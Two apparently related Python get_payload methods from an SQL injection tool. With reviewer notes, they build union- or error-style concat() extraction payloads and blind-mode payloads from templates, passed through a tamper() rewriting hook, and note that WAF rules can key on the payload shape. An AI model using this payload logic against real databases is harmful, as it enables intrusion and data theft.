def get_payload(self, table_name, col_name, i="0", index="1", value=""):
    """Render one request payload whose output is framed by a per-call token.

    A fresh token comes from ``random_str()`` and ``format_hex(token)`` is
    used as the separator between fields. The fields are a constant ``1``,
    every entry of ``col_name``, and a closing ``1``, so each requested
    column sits between two separators inside a single ``concat(...)``.
    That expression fills the ``%s`` slot of ``self.query``.

    Args:
        table_name: Replaces ``t_n`` in ``self.query``.
        col_name: Iterable of column expressions (strings) to concatenate.
        i: Replaces ``%d`` in ``self.query`` (presumably a row offset;
            confirm against the query templates).
        index: Replaces ``%index`` in ``self.boundary``. The original
            author notes index/value are only used for blind mode.
        value: Replaces ``%value`` in ``self.boundary``.

    Returns:
        ``(payload, token)``: the formatted payload string and the raw
        (not hex-formatted) token.

    NOTE(review): every placeholder is filled by sequential ``str.replace``
    with no escaping. A table or column name that contains ``t_n``, ``%s``,
    ``%d`` or ``%query`` is rewritten by a later step, so the result
    silently differs from the template's intent.
    NOTE(review): the generated expression is a ``concat()`` whose arguments
    are separated by one repeated constant (presumably a hex literal;
    confirm in ``format_hex``). Request logging and WAF rules can key on
    that shape.
    """
    # Constant sentinels on both ends guarantee a separator before the
    # first column and after the last one.
    fields = ['1', *col_name, '1']

    token = random_str()
    marker = format_hex(token)
    separator = "," + marker + ","
    cat_str = "concat(%s)".replace('%s', separator.join(fields))

    # The boundary template carries the blind-mode slots; the query template
    # carries table, column expression and row slots. Replacement order is
    # significant and kept as in the templates' original handling.
    boundary = SEP_CHAR + (
        self.boundary
        .replace('%value', value)
        .replace('%index', index)
    )
    query = (
        self.query
        .replace('t_n', table_name)
        .replace('%s', cat_str)
        .replace('%d', i)
    )

    # tamper() may rewrite both halves before they are merged.
    boundary, query = tamper(boundary, query)
    payload = format_data(boundary.replace('%query', query))

    # Debug mode writes the complete payload, including table and column
    # names, to the log.
    if conf.debug:
        logger.success(payload)
    return payload, token
def get_payload(self, table_name, col_name, i="1", index="1", value=""):
    """Render one request payload that selects a single column.

    Only the first entry of ``col_name`` is used; it fills the ``%s`` slot
    of ``self.query`` as-is. The returned token is the fixed string
    ``":--:"`` and this method does not insert it into the payload.

    Args:
        table_name: Replaces ``t_n`` in ``self.query``.
        col_name: Iterable of column expressions. It is consumed in full,
            entries after the first are ignored, and an empty iterable
            raises ``IndexError``.
        i: Replaces ``%d`` in ``self.query`` (presumably a row or character
            position; confirm against the query templates).
        index: Replaces ``%index`` in ``self.boundary``. The original
            author notes index/value are only used for blind mode.
        value: Replaces ``%value`` in ``self.boundary``.

    Returns:
        ``(payload, token)``: the formatted payload string and ``":--:"``.

    NOTE(review): placeholders are filled by sequential ``str.replace``
    with no escaping. A table or column name that contains ``t_n``, ``%s``,
    ``%d`` or ``%query`` is rewritten by a later step.
    """
    token = ":--:"
    # Materialise first so generators are consumed exactly as before, then
    # take the leading column.
    cat_str = list(col_name)[0]

    boundary = SEP_CHAR + (
        self.boundary
        .replace('%value', value)
        .replace('%index', index)
    )
    query = (
        self.query
        .replace('t_n', table_name)
        .replace('%s', cat_str)
        .replace('%d', i)
    )

    # tamper() may rewrite both halves before they are merged.
    boundary, query = tamper(boundary, query)
    payload = format_data(boundary.replace('%query', query))

    # Debug mode writes the complete payload, including table and column
    # names, to the log.
    if conf.debug:
        logger.success(payload)
    return payload, token